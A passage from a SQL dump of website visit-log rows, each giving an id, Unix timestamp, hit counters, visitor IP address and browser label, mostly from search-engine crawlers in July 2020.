,0,0,'66.249.70.69','chrome'),(525299,1595535546,1,1,0,0,'66.249.64.33','chrome'),(525300,1595535571,8,8,0,0,'185.11.82.228','other'),(525301,1595536599,1,1,0,0,'66.249.70.72','chrome'),(525302,1595536828,8,8,0,0,'185.11.82.228','other'),(525303,1595537707,1,1,0,0,'92.38.136.69','msie'),(525304,1595537842,1,1,0,0,'157.55.39.174','other'),(525305,1595537877,1,1,0,0,'66.249.64.38','chrome'),(525306,1595537897,1,1,0,0,'51.91.15.103','chrome'),(525307,1595537958,3,3,0,0,'103.18.6.177','chrome'),(525308,1595538028,1,1,0,0,'89.46.105.246','chrome'),(525309,1595538095,8,8,0,0,'185.11.82.228','other'),(525310,1595538480,1,1,0,0,'66.249.70.69','chrome'),(525311,1595538664,1,1,0,0,'66.249.64.33','chrome'),(525312,1595539107,1,0,1,0,'66.249.70.70',''),(525313,1595539163,4,4,0,0,'66.249.70.70','chrome'),(525314,1595539374,8,8,0,0,'185.11.82.228','other'),(525315,1595539429,1,1,0,0,'157.55.39.208','other'),(525316,1595539670,2,2,0,0,'185.220.102.253','other'),(525317,1595539673,1,1,0,0,'185.220.102.253','chrome'),(525318,1595539688,2,2,0,0,'66.249.70.69','chrome'),(525319,1595540130,1,1,0,0,'157.55.39.174','other'),(525320,1595540653,8,8,0,0,'185.11.82.228','other'),(525321,1595541124,1,1,0,0,'66.249.70.72','chrome'),(525322,1595541591,3,3,0,0,'66.249.70.69','chrome'),(525323,1595541744,1,1,0,0,'66.249.70.70','chrome'),(525324,1595541972,8,8,0,0,'185.11.82.228','other'),(525325,1595543247,8,8,0,0,'185.11.82.228','other'),(525326,1595543250,1,1,0,0,'66.249.70.70','chrome'),(525327,1595543473,2,2,0,0,'66.249.70.72','chrome'),(525328,1595543573,3,3,0,0,'66.249.70.69','chrome'),(525329,1595544041,1,1,0,0,'195.248.240.36','chrome'),(525330,1595544143,1,1,0,0,'8.29.198.26','other'),(525331,1595544345,2,2,0,0,'121.199.60.92','chrome'),(525332,1595544721,8,8,0,0,'185.11.82.228','other'),(525333,1595545121,1,1,0,0,'8.29.198.27','other'),(525334,1595545485,2,2,0,0,'66.249.70.69','chrome'),(525335,1595545559,2,2,0,0,'136.144.153.79','chrome'),(525336,1595545839,1,1,0,0,'66.249.64.36','chrome'),(525337,1595546087,8,8,0,0,'185.11.82.228','other'),(525338,1595546220,1,1,0,0,'66.249.70.70','chrome'),(525339,1595546290,2,2,0,0,'66.249.70.72','chrome'),(525340,1595546348,1,1,0,0,'157.55.39.208','other'),(525341,1595546550,1,1,0,0,'39.101.129.127','other'),(525342,1595546662,2,2,0,0,'66.249.70.69','chrome'),(525343,1595547226,1,1,0,0,'107.178.33.24','chrome'),(525344,1595547481,8,8,0,0,'185.11.82.228','other'),(525345,1595548242,2,2,0,0,'66.249.70.69','chrome'),(525346,1595548508,1,1,0,0,'62.205.134.182','other'),(525347,1595548583,2,2,0,0,'66.249.70.70','chrome'),(525348,1595548879,8,8,0,0,'185.11.82.228','other'),(525349,1595548985,1,1,0,0,'52.188.57.228','chrome'),(525350,1595549221,3,3,0,0,'66.249.70.69','chrome'),(525351,1595549514,2,2,0,0,'66.249.70.70','chrome'),(525352,1595549615,1,1,0,0,'66.249.70.72','chrome'),(525353,1595550101,1,1,0,0,'66.249.64.38','chrome'),(525354,1595550272,8,8,0,0,'185.11.82.228','other'),(525355,1595550385,1,1,0,0,'157.55.39.94','other'),(525356,1595550447,1,1,0,0,'118.25.97.227','chrome'),(525357,1595551282,1,1,0,0,'66.249.70.70','chrome'),(525358,1595551694,8,8,0,0,'185.11.82.228','other'),(525359,1595551888,2,2,0,0,'27.124.5.49','chrome'),(525360,1595551889,1,1,0,0,'157.55.39.94','other'),(525361,1595551969,1,1,0,0,'66.249.70.69','chrome'),(525362,1595552823,2,2,0,0,'157.55.39.208','other'),(525363,1595553063,8,8,0,0,'185.11.82.228','other'),(525364,1595553182,1,1,0,0,'89.46.104.172','chrome'),(525365,1595553194,1,1,0,0,'66.249.70.70','chrome'),(525366,1595553780,1,1,0,0,'66.249.70.69','chrome'),(525367,1595554397,1,1,0,0,'66.249.64.33','chrome'),(525368,1595554422,8,8,0,0,'185.11.82.228','other'),(525369,1595554813,1,1,0,0,'51.68.11.207','chrome'),(525371,1595554971,1,1,0,0,'8.29.198.27','other'),(525372,1595555289,1,1,0,0,'157.55.39.94','other'),(525373,1595555838,8,8,0,0,'185.11.82.228','other'),(525374,1595555950,1,1,0,0,'8.29.198.27','other'),(525375,1595555959,1,1,0,0,'66.249.70.70','chrome'),(525376,1595556296,1,1,0,0,'66.249.70.72','chrome'),(525377,1595556354,2,2,0,0,'80.88.87.101','chrome'),(525378,1595556411,1,1,0,0,'157.55.39.174','other'),(525379,1595556417,1,1,0,0,'195.248.240.19','chrome'),(525380,1595556615,1,1,0,0,'66.249.70.69','chrome'),(525381,1595556887,3,3,0,0,'66.249.70.70','chrome'),(525382,1595557274,8,8,0,0,'185.11.82.228','other'),(525383,1595557372,1,1,0,0,'66.249.70.72','chrome'),(525384,1595557692,1,1,0,0,'66.249.70.69','chrome'),(525385,1595557980,1,1,0,0,'66.249.64.36','chrome'),(525386,1595558081,1,1,0,0,'157.55.39.94','other'),(525387,1595558671,8,8,0,0,'185.11.82.228','other'),(525388,1595559157,1,1,0,0,'66.249.64.38','chrome'),(525389,1595559284,2,2,0,0,'66.249.70.72','chrome'),(525390,1595559363,3,3,0,0,'66.249.70.69','chrome'),(525391,1595559398,3,3,0,0,'66.249.70.70','chrome'),(525392,1595559678,1,1,0,0,'94.247.176.153','chrome'),(525393,1595560114,8,8,0,0,'185.11.82.228','other'),(525394,1595560273,1,1,0,0,'66.249.70.72','chrome'),(525395,1595560343,1,1,0,0,'66.249.70.69','chrome'),(525396,1595560395,1,1,0,0,'195.181.170.71','chrome'),(525397,1595560614,2,2,0,0,'66.249.70.70','chrome'),(525398,1595560785,1,1,0,0,'51.68.11.199','chrome'),(525399,1595561568,1,1,0,0,'66.249.70.70','chrome'),(525400,1595561600,8,8,0,0,'185.11.82.228','other'),(525401,1595561845,1,1,0,0,'66.249.64.33','chrome'),(525402,1595562036,1,1,0,0,'66.249.70.72','chrome'),(525403,1595562159,4,4,0,0,'66.249.70.69','chrome'),(525404,1595562421,2,2,0,0,'91.208.99.2','chrome'),(525405,1595562495,1,1,0,0,'81.88.49.11','chrome'),(525406,1595562509,1,1,0,0,'81.88.49.10','chrome'),(525407,1595562693,1,1,0,0,'185.5.236.191','chrome'),(525408,1595562880,2,2,0,0,'66.249.70.70','chrome'),(525409,1595563138,8,8,0,0,'185.11.82.228','other'),(525410,1595563220,2,2,0,0,'157.55.39.94','other'),(525411,1595563669,1,1,0,0,'128.74.165.53','chrome'),(525412,1595563767,2,2,0,0,'46.30.40.97','chrome'),(525413,1595563807,2,2,0,0,'198.49.79.226','chrome'),(525414,1595564023,1,1,0,0,'66.249.70.70','chrome'),(525415,1595564968,2,2,0,0,'66.249.70.69','chrome'),(525416,1595564994,2,2,0,0,'66.249.70.70','chrome'),(525417,1595565691,1,1,0,0,'66.249.70.72','chrome'),(525418,1595565750,8,8,0,0,'185.11.82.228','other'),(525419,1595565752,1,1,0,0,'131.220.6.152','chrome'),(525420,1595565810,1,1,0,0,'8.29.198.26','other'),(525421,1595566021,2,2,0,0,'157.55.39.174','other'),(525422,1595566062,3,3,0,0,'66.249.70.70','chrome'),(525423,1595566144,5,5,0,0,'66.249.70.69','chrome'),(525424,1595566541,1,1,0,0,'62.205.134.182','other'),(525425,1595566777,1,1,0,0,'8.29.198.27','other'),(525426,1595566974,8,8,0,0,'185.11.82.228','other'),(525427,1595567247,1,1,0,0,'66.249.70.69','chrome'),(525428,1595567343,1,1,0,0,'66.249.64.36','chrome'),(525429,1595567444,1,1,0,0,'66.249.70.72','chrome'),(525430,1595567466,1,1,0,0,'66.249.64.38','chrome'),(525431,1595567689,1,1,0,0,'66.249.70.70','chrome'),(525432,1595567876,1,1,0,0,'157.55.39.208','other'),(525433,1595568240,8,8,0,0,'185.11.82.228','other'),(525434,1595568380,1,1,0,0,'110.49.59.168','chrome'),(525435,1595568416,1,1,0,0,'37.251.155.42','chrome'),(525436,1595568573,2,2,0,0,'66.249.70.72','chrome'),(525437,1595569049,3,3,0,0,'66.249.70.69','chrome'),(525438,1595569058,2,2,0,0,'66.249.70.70','chrome'),(525439,1595569502,8,8,0,0,'185.11.82.228','other'),(525440,1595569707,1,1,0,0,'31.13.127.18','other'),(525441,1595569900,1,1,0,0,'185.5.236.191','chrome'),(525442,1595570092,1,1,0,0,'51.68.11.199','chrome'),(525443,1595570172,1,1,0,0,'178.95.156.86','chrome'),(525444,1595570258,1,1,0,0,'66.249.64.33','chrome'),(525445,1595570595,1,1,0,0,'178.154.200.222','other'),(525446,1595570651,1,1,0,0,'66.249.70.69','chrome'),(525447,1595570705,3,3,0,0,'194.1.195.225','msie'),(525448,1595570778,8,8,0,0,'185.11.82.228','other'),(525449,1595572059,8,8,0,0,'185.11.82.228','other'),(525450,1595572221,1,1,0,0,'66.249.70.69','chrome'),(525451,1595572330,1,1,0,0,'17.58.99.84','other'),(525452,1595572499,1,1,0,0,'157.55.39.94','other'),(525453,1595572633,1,1,0,0,'66.249.70.72','chrome'),(525454,1595572852,1,1,0,0,'157.55.39.174','other'),(525455,1595573036,1,1,0,0,'176.111.33.18','firefox'),(525456,1595573355,8,8,0,0,'185.11.82.228','other'),(525457,1595573528,1,1,0,0,'88.155.32.64','chrome'),(525458,1595573867,5,5,0,0,'66.249.70.70','chrome'),(525459,1595573980,2,2,0,0,'66.249.70.69','chrome'),(525460,1595574085,1,1,0,0,'66.249.70.72','chrome'),(525461,1595574091,1,1,0,0,'157.55.39.174','other'),(525462,1595574348,1,1,0,0,'138.246.253.15','chrome'),(525463,1595574678,8,8,0,0,'185.11.82.228','other'),(525464,1595575083,1,1,0,0,'66.249.70.72','chrome'),(525465,1595575411,3,3,0,0,'66.249.70.69','chrome'),(525466,1595575800,2,2,0,0,'66.249.70.70','chrome'),(525467,1595575848,2,2,0,0,'157.55.39.208','other'),(525468,1595576040,8,8,0,0,'185.11.82.228','other'),(525469,1595576046,1,1,0,0,'66.249.70.72','chrome'),(525470,1595576439,1,1,0,0,'66.249.70.69','chrome'),(525471,1595576641,1,1,0,0,'8.29.198.26','other'),(525472,1595576864,1,1,0,0,'66.249.64.33','chrome'),(525473,1595576913,1,1,0,0,'157.55.39.208','other'),(525474,1595577165,2,2,0,0,'157.55.39.174','other'),(525475,1595577423,8,8,0,0,'185.11.82.228','other'),(525476,1595577547,1,1,0,0,'176.120.37.73','chrome'),(525477,1595577577,2,2,0,0,'66.249.64.38','chrome'),(525478,1595577606,1,1,0,0,'8.29.198.25','other'),(525479,1595577844,1,1,0,0,'66.249.70.69','chrome'),(525480,1595578080,1,1,0,0,'66.249.70.70','chrome'),(525481,1595578360,1,1,0,0,'54.36.149.83','other'),(525482,1595578466,1,1,0,0,'157.55.39.174','other'),(525483,1595578827,8,8,0,0,'185.11.82.228','other'),(525484,1595579094,1,1,0,0,'91.196.178.72','chrome'),(525485,1595579279,1,1,0,0,'157.55.39.208','other'),(525486,1595579401,1,1,0,0,'46.219.95.131','chrome'),(525487,1595579523,1,1,0,0,'66.249.64.36','chrome'),(525488,1595579629,2,2,0,0,'66.249.70.69','chrome'),(525489,1595579710,1,1,0,0,'31.13.127.18','other'),(525490,1595579747,1,1,0,0,'66.249.70.72','chrome'),(525491,1595580053,1,1,0,0,'66.249.70.70','chrome'),(525492,1595580266,8,8,0,0,'185.11.82.228','other'),(525493,1595580510,1,1,0,0,'194.44.179.149','chrome'),(525494,1595580515,1,1,0,0,'157.55.39.94','other'),(525495,1595581217,1,1,0,0,'66.249.70.72','chrome'),(525496,1595581243,2,2,0,0,'66.249.70.70','chrome'),(525497,1595581685,8,8,0,0,'185.11.82.228','other'),(525498,1595581937,1,1,0,0,'91.196.178.155','chrome'),(525499,1595582604,1,0,1,0,'66.249.70.70',''),(525500,1595583144,1,1,0,0,'35.205.64.66','other'),(525501,1595583668,1,1,0,0,'178.154.200.222','other'),(525502,1595583683,1,1,0,0,'46.201.18.232','chrome'),(525503,1595584827,2,2,0,0,'66.249.64.38','chrome'),(525504,1595585423,1,1,0,0,'195.230.149.30','chrome'),(525505,1595585817,3,3,0,0,'157.55.39.174','other'),(525506,1595585950,1,1,0,0,'52.15.116.48','chrome'),(525507,1595585993,1,1,0,0,'157.55.39.94','other'),(525508,1595586085,1,1,0,0,'138.246.253.15','chrome'),(525509,1595586381,1,1,0,0,'66.249.70.70','chrome'),(525510,1595586510,1,1,0,0,'157.55.39.208','other'),(525511,1595587467,1,1,0,0,'8.29.198.25','other'),(525512,1595588162,1,1,0,0,'157.55.39.208','other'),(525513,1595588347,1,1,0,0,'31.31.118.124','chrome'),(525514,1595588432,1,1,0,0,'109.74.154.72','chrome'),(525515,1595588435,1,1,0,0,'8.29.198.26','other'),(525516,1595588493,2,2,0,0,'66.249.70.69','chrome'),(525517,1595588506,1,1,0,0,'66.249.70.70','chrome'),(525518,1595589766,2,2,0,0,'66.249.70.72','chrome'),(525519,1595590842,2,2,0,0,'66.249.70.70','chrome'),(525520,1595591090,2,2,0,0,'66.249.70.72','chrome'),(525521,1595591674,2,2,0,0,'157.55.39.94','other'),(525522,1595592063,1,1,0,0,'213.180.203.16','other'),(525523,1595592232,1,1,0,0,'157.55.39.174','other'),(525524,1595592679,2,2,0,0,'66.249.70.69','chrome'),(525525,1595592802,1,1,0,0,'66.249.64.33','chrome'),(525526,1595592933,1,1,0,0,'66.249.70.72','chrome'),(525527,1595593204,3,3,0,0,'66.249.70.70','chrome'),(525528,1595593279,2,2,0,0,'157.55.39.174','other'),(525529,1595593678,1,1,0,0,'91.196.178.186','chrome'),(525530,1595594198,1,1,0,0,'66.249.64.33','chrome'),(525531,1595594289,1,1,0,0,'157.55.39.208','other'),(525532,1595594294,1,1,0,0,'66.249.70.70','chrome'),(525533,1595594416,1,1,0,0,'66.249.70.69','chrome'),(525534,1595595510,7,7,0,0,'66.249.70.69','chrome'),(525535,1595595658,1,1,0,0,'157.55.39.208','other'),(525536,1595595795,2,2,0,0,'66.249.70.70','chrome'),(525537,1595597282,4,4,0,0,'66.249.70.70','chrome'),(525538,1595597931,1,1,0,0,'17.58.99.84','other'),(525539,1595597947,2,2,0,0,'66.249.70.72','chrome'),(525540,1595598043,1,1,0,0,'66.249.70.69','chrome'),(525541,1595598295,1,1,0,0,'8.29.198.25','other'),(525542,1595598299,1,1,0,0,'157.55.39.208','other'),(525543,1595599204,1,1,0,0,'157.55.39.208','other'),(525544,1595599260,1,1,0,0,'8.29.198.27','other'),(525545,1595599562,1,1,0,0,'66.249.70.72','chrome'),(525546,1595599610,2,2,0,0,'66.249.70.70','chrome'),(525547,1595599820,1,1,0,0,'66.249.69.198','chrome'),(525548,1595600317,1,1,0,0,'157.55.39.174','other'),(525549,1595600660,2,2,0,0,'66.249.70.69','chrome'),(525550,1595600725,2,2,0,0,'66.249.70.72','chrome'),(525551,1595600736,1,1,0,0,'54.36.149.41','other'),(525552,1595601006,1,1,0,0,'66.249.64.38','chrome'),(525553,1595603149,1,1,0,0,'66.249.70.78','chrome'),(525554,1595603350,1,1,0,0,'66.249.64.36','chrome'),(525555,1595603589,2,2,0,0,'157.55.39.174','other'),(525556,1595603823,1,1,0,0,'66.249.70.72','chrome'),(525557,1595604890,2,2,0,0,'66.249.70.70','chrome'),(525558,1595606177,2,2,0,0,'66.249.70.72','chrome'),(525559,1595606562,1,1,0,0,'66.249.70.69','chrome'),(525560,1595606570,1,1,0,0,'66.249.70.70','chrome'),(525561,1595607109,1,1,0,0,'157.55.39.174','other'),(525562,1595607132,2,2,0,0,'157.55.39.94','other'),(525563,1595607380,1,1,0,0,'66.249.64.36','chrome'),(525564,1595608085,4,4,0,0,'66.249.70.70','chrome'),(525565,1595608399,1,1,0,0,'66.249.70.72','chrome'),(525566,1595608496,2,2,0,0,'66.249.70.69','chrome'),(525567,1595608507,1,1,0,0,'178.154.200.222','other'),(525568,1595609132,1,1,0,0,'8.29.198.27','other'),(525569,1595609882,1,1,0,0,'66.249.64.36','chrome'),(525570,1595609957,2,2,0,0,'66.249.70.69','chrome'),(525571,1595610005,1,1,0,0,'66.249.70.72','chrome'),(525572,1595610089,1,1,0,0,'8.29.198.26','other'),(525573,1595610631,1,1,0,0,'66.249.64.33','chrome'),(525574,1595610850,1,1,0,0,'66.249.70.70','chrome'),(525575,1595610859,1,1,0,0,'66.249.70.69','chrome'),(525576,1595611882,1,1,0,0,'66.249.70.70','chrome'),(525577,1595612018,2,2,0,0,'66.249.70.69','chrome'),(525578,1595612123,4,4,0,0,'66.249.70.72','chrome'),(525579,1595612238,1,1,0,0,'157.55.39.174','other'),(525580,1595613565,1,1,0,0,'178.154.200.222','other'),(525581,1595614083,3,3,0,0,'66.249.70.70','chrome'),(525582,1595614314,1,1,0,0,'66.249.70.72','chrome'),(525583,1595614538,1,1,0,0,'157.55.39.208','other'),(525584,1595614542,1,1,0,0,'66.249.64.33','chrome'),(525585,1595615022,1,1,0,0,'94.153.19.218','chrome'),(525586,1595615277,2,2,0,0,'66.249.70.70','chrome'),(525587,1595615561,1,1,0,0,'66.249.70.69','chrome'),(525588,1595616205,2,2,0,0,'66.249.70.70','chrome'),(525589,1595616821,1,1,0,0,'157.55.39.208','other'),(525590,1595616979,1,1,0,0,'66.249.70.72','chrome'),(525591,1595617252,1,1,0,0,'178.154.200.222','other'),(525592,1595617265,1,1,0,0,'178.154.200.220','other'),(525593,1595617657,1,1,0,0,'66.249.64.38','chrome'),(525594,1595617696,1,1,0,0,'66.249.64.48','chrome'),(525595,1595617762,2,2,0,0,'66.249.70.69','chrome'),(525596,1595618060,1,1,0,0,'66.249.70.72','chrome'),(525597,1595618230,1,1,0,0,'66.249.64.46','chrome'),(525598,1595618826,2,2,0,0,'66.249.70.69','chrome'),(525599,1595619358,1,1,0,0,'37.73.136.151','chrome'),(525600,1595619643,1,1,0,0,'66.249.64.38','chrome'),(525601,1595619962,1,1,0,0,'8.29.198.25','other'),(525602,1595620374,2,1,1,0,'66.249.70.72',''),(525603,1595620906,1,1,0,0,'8.29.198.26','other'),(525604,1595621044,1,1,0,0,'66.249.70.72','chrome'),(525605,1595621083,1,1,0,0,'66.249.70.69','chrome'),(525606,1595621773,1,1,0,0,'66.249.70.70','chrome'),(525607,1595621910,1,1,0,0,'88.99.137.13','chrome'),(525608,1595622023,1,1,0,0,'17.58.99.84','other'),(525609,1595622343,1,1,0,0,'66.249.64.38','chrome'),(525610,1595622658,1,1,0,0,'66.249.70.69','chrome'),(525611,1595623402,1,1,0,0,'66.249.70.70','chrome'),(525612,1595623574,1,1,0,0,'178.154.200.222','other'),(525613,1595624224,3,3,0,0,'66.249.70.72','chrome'),(525614,1595624307,2,2,0,0,'66.249.70.70','chrome'),(525615,1595624548,1,1,0,0,'66.249.64.38','chrome'),(525616,1595625419,2,1,1,0,'66.249.70.69',''),(525617,1595626202,1,1,0,0,'66.249.70.69','chrome'),(525618,1595626495,2,2,0,0,'66.249.70.72','chrome'),(525619,1595627107,2,2,0,0,'66.249.70.69','chrome'),(525620,1595627180,1,1,0,0,'178.154.200.222','other'),(525621,1595627339,1,1,0,0,'66.249.64.38','chrome'),(525622,1595628009,6,6,0,0,'66.249.70.69','chrome'),(525623,1595628030,1,1,0,0,'66.249.70.70','chrome'),(525624,1595628420,1,1,0,0,'66.249.64.36','chrome'),(525625,1595628678,1,1,0,0,'157.55.39.174','other'),(525626,1595629111,8,8,0,0,'185.11.82.228','other'),(525627,1595629623,1,1,0,0,'66.249.64.36','chrome'),(525628,1595629732,1,1,0,0,'66.249.70.72','chrome'),(525629,1595629737,1,1,0,0,'66.249.64.33','chrome'),(525630,1595629767,1,1,0,0,'66.249.64.38','chrome'),(525631,1595629991,2,2,0,0,'66.249.70.69','chrome'),(525632,1595630339,8,8,0,0,'185.11.82.228','other'),(525633,1595630788,1,1,0,0,'8.29.198.25','other'),(525634,1595631290,1,1,0,0,'66.249.70.70','chrome'),(525635,1595631505,8,8,0,0,'185.11.82.228','other'),(525636,1595631732,1,1,0,0,'8.29.198.25','other'),(525637,1595632108,2,2,0,0,'66.249.70.72','chrome'),(525638,1595632687,8,8,0,0,'185.11.82.228','other'),(525639,1595633062,1,1,0,0,'66.249.70.72','chrome'),(525640,1595633158,2,2,0,0,'66.249.70.69','chrome'),(525641,1595633912,8,8,0,0,'185.11.82.228','other'),(525642,1595634907,1,1,0,0,'62.205.134.182','other'),(525643,1595635009,1,1,0,0,'66.249.70.72','chrome'),(525644,1595635157,8,8,0,0,'185.11.82.228','other'),(525645,1595635376,3,3,0,0,'178.154.200.220','chrome'),(525646,1595635402,2,2,0,0,'178.154.200.196','chrome'),(525647,1595635403,2,2,0,0,'178.154.200.97','chrome'),(525648,1595635404,2,2,0,0,'178.154.200.222','chrome'),(525649,1595635406,2,2,0,0,'213.180.203.16','chrome'),(525650,1595635585,1,1,0,0,'157.55.39.174','other'),(525651,1595635780,4,4,0,0,'66.249.70.70','chrome'),(525652,1595636398,8,8,0,0,'185.11.82.228','other'),(525653,1595636541,3,3,0,0,'66.249.70.69','chrome'),(525654,1595636763,1,1,0,0,'66.249.64.38','chrome'),(525655,1595636811,1,1,0,0,'185.127.166.170','firefox'),(525656,1595636813,1,1,0,0,'37.230.138.52','firefox'),(525657,1595636814,1,1,0,0,'37.230.138.52','other'),(525658,1595636817,1,1,0,0,'185.127.165.115','firefox'),(525659,1595636818,1,1,0,0,'185.127.165.115','other'),(525660,1595636820,1,1,0,0,'185.127.165.175','firefox'),(525661,1595636821,1,1,0,0,'185.127.164.87','firefox'),(525662,1595636822,1,1,0,0,'185.127.165.177','firefox'),(525663,1595636823,1,1,0,0,'185.127.166.227','firefox'),(525664,1595636824,1,1,0,0,'37.230.138.150','firefox'),(525665,1595636825,1,1,0,0,'185.127.167.52','firefox'),(525666,1595636826,1,1,0,0,'46.243.160.135','firefox'),(525667,1595636834,1,1,0,0,'185.127.164.41','firefox'),(525668,1595636836,1,1,0,0,'46.243.160.155','firefox'),(525669,1595636995,4,4,0,0,'66.249.70.70','chrome'),(525670,1595637001,1,1,0,0,'66.249.64.33','chrome'),(525671,1595637122,2,2,0,0,'66.249.70.72','chrome'),(525672,1595637146,1,1,0,0,'154.51.131.142','chrome'),(525673,1595637641,8,8,0,0,'185.11.82.228','other'),(525674,1595638063,2,2,0,0,'66.249.64.33','chrome'),(525675,1595638325,1,1,0,0,'66.249.64.36','chrome'),(525676,1595638391,4,4,0,0,'66.249.70.72','chrome'),(525677,1595638443,5,5,0,0,'66.249.70.70','chrome'),(525678,1595638909,8,8,0,0,'185.11.82.228','other'),(525679,1595639517,1,1,0,0,'157.55.39.208','other'),(525680,1595639578,1,1,0,0,'46.29.248.184','chrome'),(525681,1595639582,1,1,0,0,'5.157.33.22','chrome'),(525682,1595639585,2,2,0,0,'66.249.70.72','chrome'),(525683,1595640163,8,8,0,0,'185.11.82.228','other'),(525684,1595640513,3,3,0,0,'66.249.70.70','chrome'),(525685,1595640683,1,1,0,0,'66.249.64.38','chrome'),(525686,1595640723,1,1,0,0,'66.249.64.33','chrome'),(525687,1595640788,1,1,0,0,'157.55.39.208','other'),(525688,1595640793,2,2,0,0,'66.249.70.69','chrome'),(525689,1595640819,1,1,0,0,'66.249.64.36','chrome'),(525690,1595641412,8,8,0,0,'185.11.82.228','other'),(525691,1595641615,1,1,0,0,'8.29.198.27','other'),(525692,1595642206,2,2,0,0,'66.249.70.72','chrome'),(525693,1595642469,1,1,0,0,'66.249.70.70','chrome'),(525694,1595642558,1,1,0,0,'8.29.198.26','other'),(525695,1595642622,1,1,0,0,'66.249.70.69','chrome'),(525696,1595642665,8,8,0,0,'185.11.82.228','other'),(525697,1595642762,1,1,0,0,'66.249.64.38','chrome'),(525698,1595643140,1,1,0,0,'157.55.39.94','other'),(525699,1595643890,2,2,0,0,'157.55.39.174','other'),(525700,1595643947,8,8,0,0,'185.11.82.228','other'),(525701,1595644057,1,1,0,0,'167.71.129.64','chrome'),(525702,1595644097,2,2,0,0,'80.88.87.101','chrome'),(525703,1595644227,1,1,0,0,'66.249.64.38','chrome'),(525704,1595644306,3,3,0,0,'66.249.70.72','chrome'),(525705,1595644358,2,2,0,0,'66.249.70.70','chrome'),(525706,1595644590,2,2,0,0,'66.249.70.69','chrome'),(525707,1595644813,1,1,0,0,'66.249.64.36','chrome'),(525708,1595645314,8,8,0,0,'185.11.82.228','other'),(525709,1595646143,1,1,0,0,'66.249.64.36','chrome'),(525710,1595646222,1,1,0,0,'66.249.70.70','chrome'),(525711,1595646498,1,1,0,0,'66.249.70.69','chrome'),(525712,1595646748,8,8,0,0,'185.11.82.228','other'),(525713,1595646953,1,1,0,0,'66.249.70.72','chrome'),(525714,1595646967,1,1,0,0,'51.68.11.215','chrome'),(525715,1595647091,3,3,0,0,'62.210.185.4','chrome'),(525716,1595647929,2,2,0,0,'66.249.70.72','chrome'),(525717,1595648065,1,1,0,0,'91.196.178.176','chrome'),(525718,1595648160,8,8,0,0,'185.11.82.228','other'),(525719,1595648165,1,1,0,0,'66.249.70.70','chrome'),(525720,1595648182,3,3,0,0,'66.249.70.69','chrome'),(525721,1595648990,2,2,0,0,'157.55.39.208','other'),(525722,1595649307,1,1,0,0,'66.249.70.70','chrome'),(525723,1595649574,8,8,0,0,'185.11.82.228','other'),(525724,1595649941,2,2,0,0,'46.252.205.142','chrome'),(525725,1595650672,1,1,0,0,'66.249.70.72','chrome'),(525726,1595650691,1,1,0,0,'62.173.145.191','chrome'),(525727,1595650795,6,6,0,0,'66.249.70.69','chrome'),(525728,1595651792,1,1,0,0,'66.249.64.36','chrome'),(525729,1595651863,1,1,0,0,'157.55.39.208','other'),(525730,1595651942,1,1,0,0,'131.220.6.152','chrome'),(525731,1595652058,8,8,0,0,'185.11.82.228','other'),(525732,1595652157,2,2,0,0,'66.249.70.70','chrome'),(525733,1595652291,1,1,0,0,'66.249.70.69','chrome'),(525734,1595652438,1,1,0,0,'8.29.198.26','other'),(525735,1595652757,1,1,0,0,'62.205.134.182','other'),(525736,1595652857,1,1,0,0,'157.55.39.188','other'),(525737,1595652982,3,3,0,0,'66.249.70.72','chrome'),(525738,1595652984,2,2,0,0,'89.46.104.165','chrome'),(525739,1595653207,8,8,0,0,'185.11.82.228','other'),(525740,1595653390,1,1,0,0,'62.173.145.191','chrome'),(525741,1595653392,1,1,0,0,'8.29.198.26','other'),(525742,1595653562,1,1,0,0,'157.55.39.208','other'),(525743,1595653696,2,2,0,0,'66.249.70.70','chrome'),(525744,1595653787,1,1,0,0,'66.249.70.69','chrome'),(525745,1595654149,1,1,0,0,'213.180.203.16','other'),(525746,1595654357,8,8,0,0,'185.11.82.228','other'),(525747,1595654433,1,1,0,0,'37.17.224.121','chrome'),(525748,1595654908,3,3,0,0,'66.249.70.70','chrome'),(525749,1595655271,1,1,0,0,'66.249.70.69','chrome'),(525750,1595655454,2,2,0,0,'66.249.70.72','chrome'),(525751,1595655516,8,8,0,0,'185.11.82.228','other'),(525752,1595655987,1,1,0,0,'17.58.99.84','other'),(525753,1595656092,1,1,0,0,'188.165.225.146','chrome'),(525754,1595656505,2,2,0,0,'66.249.70.70','chrome'),(525755,1595656684,8,8,0,0,'185.11.82.228','other'),(525756,1595657368,1,1,0,0,'178.210.68.22','chrome'),(525757,1595657393,1,1,0,0,'66.249.70.72','chrome'),(525758,1595657499,1,1,0,0,'185.10.99.21','chrome'),(525759,1595657843,2,2,0,0,'66.249.70.70','chrome'),(525760,1595657859,8,8,0,0,'185.11.82.228','other'),(525761,1595658117,1,1,0,0,'31.13.127.10','other'),(525762,1595658823,1,1,0,0,'66.249.70.72','chrome'),(525763,1595658893,2,2,0,0,'66.249.70.69','chrome'),(525764,1595659014,8,8,0,0,'185.11.82.228','other'),(525765,1595659066,1,1,0,0,'66.249.70.70','chrome'),(525766,1595659358,1,1,0,0,'66.249.64.38','chrome'),(525767,1595659615,1,1,0,0,'66.249.64.33','chrome'),(525768,1595660122,1,1,0,0,'209.17.96.42','other'),(525769,1595660210,8,8,0,0,'185.11.82.228','other'),(525770,1595660320,1,1,0,0,'66.249.70.70','chrome'),(525771,1595660595,2,2,0,0,'66.249.70.69','chrome'),(525772,1595660626,2,2,0,0,'66.249.64.33','chrome'),(525773,1595660915,1,1,0,0,'66.249.70.72','chrome'),(525774,1595661440,8,8,0,0,'185.11.82.228','other'),(525775,1595661664,1,1,0,0,'17.58.99.84','other'),(525776,1595661779,3,3,0,0,'157.55.39.208','other'),(525777,1595661943,2,2,0,0,'66.249.70.69','chrome'),(525778,1595662061,1,1,0,0,'66.249.64.38','chrome'),(525779,1595662262,2,2,0,0,'66.249.70.72','chrome'),(525780,1595662620,8,8,0,0,'185.11.82.228','other'),(525781,1595662652,1,1,0,0,'66.249.70.70','chrome'),(525782,1595663060,2,2,0,0,'95.134.220.25','chrome'),(525783,1595663248,2,2,0,0,'157.55.39.208','other'),(525784,1595663260,1,1,0,0,'8.29.198.27','other'),(525785,1595663540,1,1,0,0,'66.249.64.38','chrome'),(525786,1595663816,8,8,0,0,'185.11.82.228','other'),(525787,1595663925,2,2,0,0,'66.249.70.69','chrome'),(525788,1595663968,1,1,0,0,'213.180.203.16','other'),(525789,1595664113,3,3,0,0,'66.249.70.72','chrome'),(525790,1595664217,1,1,0,0,'8.29.198.26','other'),(525791,1595664413,3,3,0,0,'66.249.70.70','chrome'),(525792,1595665029,8,8,0,0,'185.11.82.228','other'),(525793,1595665329,1,1,0,0,'66.249.64.36','chrome'),(525794,1595665491,2,2,0,0,'66.2